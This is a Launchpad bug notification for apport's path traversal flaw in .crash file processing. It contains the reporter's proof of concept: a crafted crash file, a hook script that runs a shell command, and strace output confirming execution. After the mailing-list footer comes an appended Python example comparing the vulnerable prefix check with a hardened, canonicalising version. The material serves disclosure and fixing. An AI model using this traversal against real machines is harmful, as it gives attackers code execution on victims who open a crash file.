** Changed in: apport (Ubuntu Artful)
       Status: Confirmed => In Progress

** Changed in: apport (Ubuntu Artful)
     Assignee: (unassigned) => Brian Murray (brian-murray)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1700573

Title:
  Code execution through path traversal in .crash files processing

Status in Apport:
  Fix Released
Status in apport package in Ubuntu:
  In Progress
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Xenial:
  Fix Released
Status in apport source package in Yakkety:
  Fix Released
Status in apport source package in Zesty:
  Fix Released
Status in apport source package in Artful:
  In Progress

Bug description:
  The function add_hooks_info in apport/report.py is vulnerable to a
  directory traversal when processing the ExecutablePath key of a
  malicious .crash file:

      opt_path = None
      if self.get('ExecutablePath', '').startswith(_opt_dir):
          opt_path = self.get('ExecutablePath', '')
      elif package:
          # check package contents
          try:
              for f in apport.packaging.get_files(package):
                  if f.startswith(_opt_dir) and os.path.isfile(f):
                      opt_path = f
                      break
          except ValueError:
              # uninstalled package
              pass

      if opt_path:
          while len(opt_path) >= len(_opt_dir):
              hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
              opt_path = os.path.dirname(opt_path)

  This can be used to execute an arbitrary python script from an
  attacker controlled path when a crash file is opened:

      fwilhelm@box:~$ cat poc.crash
      ProblemType: Bug
      ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
      Package: f

      fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py
      import os
      os.system("gnome-calculator")

      fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
      [pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
      [pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0

  The sub directory requirement makes this a bit tricky to exploit
  remotely, but depending on the environment a malicious USB drive, a
  shared NFS share or a crash file inside an archive could be used.

  Please credit Felix Wilhelm from the Google Security Team in all
  releases, patches and advisories related to these issues.

To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
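Added example, not the reporter's code and not apport's actual fix: the prefix-only walk from the report reproduced as hook_dirs_unchecked, beside a hardened hook_dirs_checked that canonicalises ExecutablePath before the /opt containment test, run over a constructed copy of the poc.crash shown above. The function names, parse_crash and the use of os.path.normpath (instead of realpath, so the example needs no filesystem) are assumptions of this example.

```python
import os

OPT_DIR = '/opt'
HOOK_SUBDIR = ('share', 'apport', 'package-hooks')

def parse_crash(text):
    """Parse the 'Key: value' lines of a .crash file (multi-line values,
    which real reports can carry, are not handled by this sketch)."""
    fields = {}
    for line in text.splitlines():
        if ':' in line:
            key, value = line.split(':', 1)
            fields[key.strip()] = value.strip()
    return fields

def hook_dirs_unchecked(executable_path, opt_dir=OPT_DIR):
    """Same walk as the report's snippet: only a string prefix is checked,
    so '/opt/../tmp/...' passes and the loop emits dirs outside /opt."""
    dirs = []
    if not executable_path.startswith(opt_dir):
        return dirs
    opt_path = executable_path
    while len(opt_path) >= len(opt_dir):
        dirs.append(os.path.join(opt_path, *HOOK_SUBDIR))
        opt_path = os.path.dirname(opt_path)
    return dirs

def hook_dirs_checked(executable_path, opt_dir=OPT_DIR):
    """Hardened variant: canonicalise first, then accept only opt_dir itself
    or something below it (prefix plus separator, so '/optional' is out).
    normpath keeps the example filesystem-free; a deployment would use
    os.path.realpath so symlinks are collapsed as well."""
    canonical = os.path.normpath(executable_path)
    if canonical != opt_dir and not canonical.startswith(opt_dir + os.sep):
        return []
    return hook_dirs_unchecked(canonical, opt_dir)

def hook_dirs_from_crash(text, checked=True):
    path = parse_crash(text).get('ExecutablePath', '')
    return hook_dirs_checked(path) if checked else hook_dirs_unchecked(path)

# Constructed sample that mirrors the poc.crash shown in the report.
POC_CRASH = "ProblemType: Bug\nExecutablePath: /opt/../tmp/poc/share/apport/package-hooks\nPackage: f\n"

if __name__ == '__main__':
    print(hook_dirs_from_crash(POC_CRASH, checked=False))  # includes /opt/../tmp/poc/share/apport/package-hooks
    print(hook_dirs_from_crash(POC_CRASH))                 # []
```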